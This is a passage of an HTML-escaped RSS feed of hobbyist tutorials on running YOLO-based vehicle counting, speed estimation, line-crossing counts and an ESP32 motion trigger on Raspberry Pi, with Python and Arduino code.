&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;f&amp;quot;Zone {z} Up:{counts[z][&amp;#039;up&amp;#039;]} Down:{counts[z][&amp;#039;down&amp;#039;]}&amp;quot;,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;(10, z - 10),&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cv2.FONT_HERSHEY_SIMPLEX,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;0.5,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;(0, 255, 0),&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;1)&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cv2.imshow(&amp;quot;Multi-Zone Traffic AI&amp;quot;, frame)&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if cv2.waitKey(1) &amp;amp; 0xFF == 27:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;break&lt;br /&gt;
&lt;br /&gt;
cap.release()&lt;br /&gt;
cv2.destroyAllWindows()&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
How it works&lt;br /&gt;
&lt;br /&gt;
The AI model detects vehicles and calculates their vertical center.&lt;br /&gt;
When the center crosses any defined zone line, the direction of movement&lt;br /&gt;
determines whether it is counted as upward or downward traffic.&lt;br /&gt;
&lt;br /&gt;
Each zone maintains independent counters.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Practical applications&lt;br /&gt;
&lt;br /&gt;
- Intersection traffic analysis&lt;br /&gt;
- Lane-based vehicle flow estimation&lt;br /&gt;
- Smart city traffic prototypes&lt;br /&gt;
- Educational computer vision projects&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Limitations&lt;br /&gt;
&lt;br /&gt;
- Assumes one main vehicle at a time&lt;br /&gt;
- Occlusions can affect counts&lt;br /&gt;
- Advanced tracking improves accuracy&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Conclusion&lt;br /&gt;
&lt;br /&gt;
Multi-zone traffic analytics demonstrate how Raspberry Pi can handle&lt;br /&gt;
complex AI-based counting tasks without expensive hardware.&lt;br /&gt;
&lt;br /&gt;
By combining simple logic with lightweight AI models, affordable systems&lt;br /&gt;
can deliver useful traffic insights.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------</description>
<category>AI + Rasberry PI</category>
<guid isPermaLink="true">https://asky.uk/111/multi-traffic-analytics-multiple-lines-directions-raspberry</guid>
<pubDate>Sun, 04 Jan 2026 22:03:49 +0000</pubDate>
</item>
<item>
<title>Simple AI Traffic Analytics (Object Count + Speed) on Raspberry P</title>
<link>https://asky.uk/110/simple-ai-traffic-analytics-object-count-speed-on-raspberry</link>
<description>Hardware: Raspberry Pi 4 / Raspberry Pi 5&lt;br /&gt;
AI type: Computer Vision – Traffic Analytics&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Overview&lt;br /&gt;
&lt;br /&gt;
This project combines AI-based object counting and speed estimation to build&lt;br /&gt;
a simple traffic analytics system on Raspberry Pi.&lt;br /&gt;
&lt;br /&gt;
The system detects vehicles, counts them, and estimates their speed using&lt;br /&gt;
camera input and lightweight AI models. Everything runs locally without&lt;br /&gt;
cloud services or GPUs.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
What you build&lt;br /&gt;
&lt;br /&gt;
- Vehicle detection using AI&lt;br /&gt;
- Real-time vehicle counting&lt;br /&gt;
- Approximate speed estimation&lt;br /&gt;
- Fully offline traffic analytics&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Required hardware&lt;br /&gt;
&lt;br /&gt;
- Raspberry Pi 4 or Raspberry Pi 5&lt;br /&gt;
- Camera (USB or Raspberry Pi Camera)&lt;br /&gt;
- microSD card&lt;br /&gt;
- Power supply&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Software requirements&lt;br /&gt;
&lt;br /&gt;
- Raspberry Pi OS&lt;br /&gt;
- Python 3&lt;br /&gt;
- OpenCV&lt;br /&gt;
- Ultralytics YOLO (lightweight model)&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
System architecture&lt;br /&gt;
&lt;br /&gt;
1. Camera captures video frames&lt;br /&gt;
2. AI model detects vehicles&lt;br /&gt;
3. Each detected vehicle is counted&lt;br /&gt;
4. Vehicle movement between frames is tracked&lt;br /&gt;
5. Speed is estimated using distance and time&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Installation&lt;br /&gt;
&lt;br /&gt;
sudo apt update&lt;br /&gt;
sudo apt upgrade&lt;br /&gt;
sudo apt install python3-opencv python3-pip&lt;br /&gt;
pip3 install ultralytics&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
AI model&lt;br /&gt;
&lt;br /&gt;
A lightweight YOLO Nano model is used for vehicle detection.&lt;br /&gt;
The model is pre-trained and used only for inference.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Python code (copy-paste)&lt;br /&gt;
&lt;br /&gt;
import cv2&lt;br /&gt;
import time&lt;br /&gt;
import math&lt;br /&gt;
from ultralytics import YOLO&lt;br /&gt;
&lt;br /&gt;
model = YOLO(&amp;quot;yolov8n.pt&amp;quot;)&lt;br /&gt;
cap = cv2.VideoCapture(0)&lt;br /&gt;
&lt;br /&gt;
PIXELS_PER_METER = 60&lt;br /&gt;
prev_positions = {}&lt;br /&gt;
vehicle_id = 0&lt;br /&gt;
counted = set()&lt;br /&gt;
&lt;br /&gt;
while True:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;ret, frame = cap.read()&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if not ret:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;break&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;results = model(frame, verbose=False)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;boxes = results[0].boxes&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;current_time = time.time()&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;current_positions = {}&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;for box in boxes:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;x1, y1, x2, y2 = box.xyxy[0]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cx = int((x1 + x2) / 2)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cy = int((y1 + y2) / 2)&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;matched = False&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;for vid, (px, py, pt) in prev_positions.items():&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;dist = math.hypot(cx - px, cy - py)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if dist &amp;lt; 50:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;speed = (dist / PIXELS_PER_METER) / (current_time - pt)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;current_positions[vid] = (cx, cy, current_time)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;matched = True&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;break&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if not matched:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;current_positions[vehicle_id] = (cx, cy, current_time)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;counted.add(vehicle_id)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;vehicle_id += 1&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;prev_positions = current_positions&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cv2.putText(frame, f&amp;quot;Vehicles counted: {len(counted)}&amp;quot;,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;(10, 30), cv2.FONT_HERSHEY_SIMPLEX,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;0.8, (0, 255, 0), 2)&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cv2.imshow(&amp;quot;AI Traffic Analytics&amp;quot;, frame)&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if cv2.waitKey(1) &amp;amp; 0xFF == 27:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;break&lt;br /&gt;
&lt;br /&gt;
cap.release()&lt;br /&gt;
cv2.destroyAllWindows()&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
How it works&lt;br /&gt;
&lt;br /&gt;
Vehicles are detected using AI and represented by their center point.&lt;br /&gt;
By comparing movement between frames and measuring time differences,&lt;br /&gt;
the system estimates approximate speed.&lt;br /&gt;
&lt;br /&gt;
Counting is performed by assigning each detected vehicle a unique ID.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Calibration note&lt;br /&gt;
&lt;br /&gt;
The PIXELS_PER_METER value depends on camera position and scene scale.&lt;br /&gt;
It must be adjusted experimentally for realistic speed values.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Practical applications&lt;br /&gt;
&lt;br /&gt;
- Traffic flow monitoring&lt;br /&gt;
- Speed trend estimation&lt;br /&gt;
- Smart city prototypes&lt;br /&gt;
- Educational AI projects&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Limitations&lt;br /&gt;
&lt;br /&gt;
- Speed values are approximate&lt;br /&gt;
- Camera angle affects accuracy&lt;br /&gt;
- Not suitable for legal speed enforcement&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Conclusion&lt;br /&gt;
&lt;br /&gt;
This project demonstrates that meaningful traffic analytics can be built&lt;br /&gt;
on Raspberry Pi using AI, without expensive hardware or cloud services.&lt;br /&gt;
&lt;br /&gt;
Affordable hardware combined with smart software design enables&lt;br /&gt;
practical AI solutions.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------</description>
<category>AI + Rasberry PI</category>
<guid isPermaLink="true">https://asky.uk/110/simple-ai-traffic-analytics-object-count-speed-on-raspberry</guid>
<pubDate>Sun, 04 Jan 2026 22:02:11 +0000</pubDate>
</item>
<item>
<title>ESP32 Motion Sensor Trigger → Raspberry Pi AI Vision</title>
<link>https://asky.uk/109/esp32-motion-sensor-trigger-%E2%86%92-raspberry-pi-ai-vision</link>
<description>&lt;p&gt;&lt;img alt="" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQuByMilKuQhxatpOWvrseefdZS98yis0GbvA&amp;amp;s" style="height:355px; width:632px"&gt;&lt;br&gt;Hardware: ESP32 + Raspberry Pi 4 / 5&lt;br&gt;AI type: Hybrid AI (Sensor Trigger + Computer Vision)&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;Overview&lt;br&gt;&lt;br&gt;This project demonstrates a hybrid AI system where an ESP32 with a motion sensor&lt;br&gt;acts as a low-power trigger, while a Raspberry Pi runs AI vision only when motion&lt;br&gt;is detected.&lt;br&gt;&lt;br&gt;This approach saves power and CPU resources by activating AI processing only&lt;br&gt;when needed.&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;What you build&lt;br&gt;&lt;br&gt;- ESP32 motion detection node&lt;br&gt;- Raspberry Pi AI vision system&lt;br&gt;- Wireless trigger via Wi-Fi&lt;br&gt;- Fully local processing&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;Required hardware&lt;br&gt;&lt;br&gt;- ESP32 development board&lt;br&gt;- PIR motion sensor (HC-SR501 or compatible)&lt;br&gt;- Raspberry Pi 4 or Raspberry Pi 5&lt;br&gt;- Camera (Pi Camera or USB camera)&lt;br&gt;- Wi-Fi network&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;Software requirements&lt;br&gt;&lt;br&gt;ESP32:&lt;br&gt;- Arduino IDE&lt;br&gt;- WiFi library&lt;br&gt;&lt;br&gt;Raspberry Pi:&lt;br&gt;- Raspberry Pi OS&lt;br&gt;- Python 3&lt;br&gt;- OpenCV&lt;br&gt;- Ultralytics YOLO&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;System architecture&lt;br&gt;&lt;br&gt;1. ESP32 monitors motion using a PIR sensor&lt;br&gt;2. When motion is detected, ESP32 sends a Wi-Fi message&lt;br&gt;3. Raspberry Pi receives the trigger&lt;br&gt;4. AI vision starts only on demand&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;ESP32 Arduino code (motion trigger)&lt;br&gt;&lt;br&gt;#include &amp;lt;WiFi.h&amp;gt;&lt;br&gt;&lt;br&gt;const char* ssid = "YOUR_WIFI";&lt;br&gt;const char* password = "YOUR_PASSWORD";&lt;br&gt;&lt;br&gt;const char* pi_ip = "192.168.1.100";&lt;br&gt;const int pi_port = 5000;&lt;br&gt;&lt;br&gt;int pirPin = 13;&lt;br&gt;&lt;br&gt;void setup() {&lt;br&gt;&amp;nbsp; pinMode(pirPin, INPUT);&lt;br&gt;&amp;nbsp; Serial.begin(115200);&lt;br&gt;&lt;br&gt;&amp;nbsp; WiFi.begin(ssid, password);&lt;br&gt;&amp;nbsp; while (WiFi.status() != WL_CONNECTED) {&lt;br&gt;&amp;nbsp; &amp;nbsp; delay(500);&lt;br&gt;&amp;nbsp; }&lt;br&gt;}&lt;br&gt;&lt;br&gt;void loop() {&lt;br&gt;&amp;nbsp; if (digitalRead(pirPin) == HIGH) {&lt;br&gt;&amp;nbsp; &amp;nbsp; WiFiClient client;&lt;br&gt;&amp;nbsp; &amp;nbsp; if (client.connect(pi_ip, pi_port)) {&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; client.println("MOTION");&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; client.stop();&lt;br&gt;&amp;nbsp; &amp;nbsp; }&lt;br&gt;&amp;nbsp; &amp;nbsp; delay(3000);&lt;br&gt;&amp;nbsp; }&lt;br&gt;}&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;Raspberry Pi Python trigger listener&lt;br&gt;&lt;br&gt;import socket&lt;br&gt;import subprocess&lt;br&gt;&lt;br&gt;HOST = "0.0.0.0"&lt;br&gt;PORT = 5000&lt;br&gt;&lt;br&gt;sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)&lt;br&gt;sock.bind((HOST, PORT))&lt;br&gt;sock.listen(1)&lt;br&gt;&lt;br&gt;print("Waiting for ESP32 trigger...")&lt;br&gt;&lt;br&gt;while True:&lt;br&gt;&amp;nbsp; &amp;nbsp; conn, addr = sock.accept()&lt;br&gt;&amp;nbsp; &amp;nbsp; data = conn.recv(1024).decode().strip()&lt;br&gt;&amp;nbsp; &amp;nbsp; if data == "MOTION":&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; print("Motion detected - starting AI vision")&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; subprocess.Popen(["python3", "ai_vision.py"])&lt;br&gt;&amp;nbsp; &amp;nbsp; conn.close()&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;Raspberry Pi AI vision example (ai_vision.py)&lt;br&gt;&lt;br&gt;import cv2&lt;br&gt;from ultralytics import YOLO&lt;br&gt;&lt;br&gt;model = YOLO("yolov8n.pt")&lt;br&gt;cap = cv2.VideoCapture(0)&lt;br&gt;&lt;br&gt;for i in range(100):&lt;br&gt;&amp;nbsp; &amp;nbsp; ret, frame = cap.read()&lt;br&gt;&amp;nbsp; &amp;nbsp; if not ret:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; break&lt;br&gt;&amp;nbsp; &amp;nbsp; results = model(frame, verbose=False)&lt;br&gt;&amp;nbsp; &amp;nbsp; cv2.imshow("AI Vision", frame)&lt;br&gt;&amp;nbsp; &amp;nbsp; if cv2.waitKey(1) &amp;amp; 0xFF == 27:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; break&lt;br&gt;&lt;br&gt;cap.release()&lt;br&gt;cv2.destroyAllWindows()&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;How it works&lt;br&gt;&lt;br&gt;The ESP32 continuously monitors motion with very low power usage.&lt;br&gt;When motion is detected, it sends a simple trigger message to the Raspberry Pi.&lt;br&gt;The Raspberry Pi then activates AI vision for a limited time.&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;Practical applications&lt;br&gt;&lt;br&gt;- Smart surveillance systems&lt;br&gt;- Wildlife monitoring&lt;br&gt;- Energy-efficient AI cameras&lt;br&gt;- Security triggers&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;Limitations&lt;br&gt;&lt;br&gt;- Requires Wi-Fi connectivity&lt;br&gt;- PIR detects motion, not object type&lt;br&gt;- AI runtime duration must be managed&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;Conclusion&lt;br&gt;&lt;br&gt;By combining ESP32 sensors with Raspberry Pi AI vision, efficient hybrid AI systems&lt;br&gt;can be built on affordable hardware.&lt;br&gt;&lt;br&gt;AI without millions is achieved through smart architecture, not expensive hardware.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description>
<category>AI + Rasberry PI</category>
<guid isPermaLink="true">https://asky.uk/109/esp32-motion-sensor-trigger-%E2%86%92-raspberry-pi-ai-vision</guid>
<pubDate>Sun, 04 Jan 2026 22:00:20 +0000</pubDate>
</item>
<item>
<title>Line Crossing Counter with AI on Raspberry Pi (Entry / Exit Detection)</title>
<link>https://asky.uk/108/line-crossing-counter-with-raspberry-entry-exit-detection</link>
<description>&lt;p data-start="368" data-end="417"&gt;&lt;strong data-start="368" data-end="417"&gt;Line Crossing Counter with AI on Raspberry Pi&lt;/strong&gt;&lt;/p&gt;&lt;p data-start="419" data-end="493"&gt;Hardware: Raspberry Pi 4 / 5&lt;br data-start="447" data-end="450"&gt;AI type: Computer Vision – Object Detection&lt;/p&gt;&lt;hr data-start="495" data-end="498"&gt;&lt;p data-start="500" data-end="512"&gt;&lt;strong data-start="500" data-end="512"&gt;Overview&lt;/strong&gt;&lt;/p&gt;&lt;p data-start="514" data-end="741"&gt;This project shows how a Raspberry Pi can count entries and exits using AI.&lt;br data-start="589" data-end="592"&gt;Objects are detected by a lightweight AI model and counted when they cross a virtual line.&lt;br data-start="682" data-end="685"&gt;Everything runs locally, without cloud services or GPUs.&lt;/p&gt;&lt;hr data-start="743" data-end="746"&gt;&lt;p data-start="748" data-end="766"&gt;&lt;strong data-start="748" data-end="766"&gt;What you build&lt;/strong&gt;&lt;/p&gt;&lt;ul data-start="768" data-end="883"&gt;&lt;li data-start="768" data-end="807"&gt;&lt;p data-start="770" data-end="807"&gt;AI object detection on Raspberry Pi&lt;/p&gt;&lt;/li&gt;&lt;li data-start="808" data-end="854"&gt;&lt;p data-start="810" data-end="854"&gt;Entry / exit counting using a virtual line&lt;/p&gt;&lt;/li&gt;&lt;li data-start="855" data-end="883"&gt;&lt;p data-start="857" data-end="883"&gt;Fully offline processing&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="885" data-end="888"&gt;&lt;p data-start="890" data-end="911"&gt;&lt;strong data-start="890" data-end="911"&gt;Required hardware&lt;/strong&gt;&lt;/p&gt;&lt;ul data-start="913" data-end="1000"&gt;&lt;li data-start="913" data-end="936"&gt;&lt;p data-start="915" data-end="936"&gt;Raspberry Pi 4 or 5&lt;/p&gt;&lt;/li&gt;&lt;li data-start="937" data-end="966"&gt;&lt;p data-start="939" data-end="966"&gt;Camera (Pi Camera or USB)&lt;/p&gt;&lt;/li&gt;&lt;li data-start="967" data-end="983"&gt;&lt;p data-start="969" data-end="983"&gt;microSD card&lt;/p&gt;&lt;/li&gt;&lt;li data-start="984" data-end="1000"&gt;&lt;p data-start="986" data-end="1000"&gt;Power supply&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="1002" data-end="1005"&gt;&lt;p data-start="1007" data-end="1019"&gt;&lt;strong data-start="1007" data-end="1019"&gt;Software&lt;/strong&gt;&lt;/p&gt;&lt;ul data-start="1021" data-end="1085"&gt;&lt;li data-start="1021" data-end="1040"&gt;&lt;p data-start="1023" data-end="1040"&gt;Raspberry Pi OS&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1041" data-end="1053"&gt;&lt;p data-start="1043" data-end="1053"&gt;Python 3&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1054" data-end="1064"&gt;&lt;p data-start="1056" data-end="1064"&gt;OpenCV&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1065" data-end="1085"&gt;&lt;p data-start="1067" data-end="1085"&gt;Ultralytics YOLO&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="1087" data-end="1090"&gt;&lt;p data-start="1092" data-end="1108"&gt;&lt;strong data-start="1092" data-end="1108"&gt;Installation&lt;/strong&gt;&lt;/p&gt;&lt;pre class="overflow-visible! px-0!" data-start="1110" data-end="1219"&gt;&lt;/pre&gt;&lt;div class="contain-inline-size rounded-2xl corner-superellipse/1.1 relative bg-token-sidebar-surface-primary"&gt;&lt;/div&gt;&lt;pre class="overflow-visible! px-0!" data-start="1110" data-end="1219"&gt;&lt;/pre&gt;&lt;div class="@w-xl/main:top-9 sticky top-[calc(--spacing(9)+var(--header-height))]"&gt;&lt;div class="absolute end-0 bottom-0 flex h-9 items-center pe-2"&gt;&lt;div class="bg-token-bg-elevated-secondary text-token-text-secondary flex items-center gap-4 rounded-sm px-2 font-sans text-xs"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;pre class="overflow-visible! px-0!" data-start="1110" data-end="1219"&gt;&lt;/pre&gt;&lt;div class="contain-inline-size rounded-2xl corner-superellipse/1.1 relative bg-token-sidebar-surface-primary"&gt;&lt;div class="overflow-y-auto p-4" dir="ltr"&gt;&lt;code class="whitespace-pre!"&gt;&lt;span&gt;&lt;span&gt;&lt;span class="hljs-built_in"&gt;sudo&lt;/span&gt;&lt;/span&gt;&lt;span&gt; apt update &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-built_in"&gt;sudo&lt;/span&gt;&lt;/span&gt;&lt;span&gt; apt upgrade &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-built_in"&gt;sudo&lt;/span&gt;&lt;/span&gt;&lt;span&gt; apt install python3-opencv python3-pip pip3 install ultralytics &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;hr data-start="1221" data-end="1224"&gt;&lt;p data-start="1226" data-end="1237"&gt;&lt;strong data-start="1226" data-end="1237"&gt;Concept&lt;/strong&gt;&lt;/p&gt;&lt;p data-start="1239" data-end="1393"&gt;A horizontal virtual line is placed in the video frame.&lt;br data-start="1294" data-end="1297"&gt;When an object’s center crosses the line, it is counted as entry or exit depending on direction.&lt;/p&gt;&lt;hr data-start="1395" data-end="1398"&gt;&lt;p data-start="1400" data-end="1428"&gt;&lt;strong data-start="1400" data-end="1428"&gt;Python code (copy-paste)&lt;/strong&gt;&lt;/p&gt;&lt;pre class="overflow-visible! px-0!" data-start="1430" 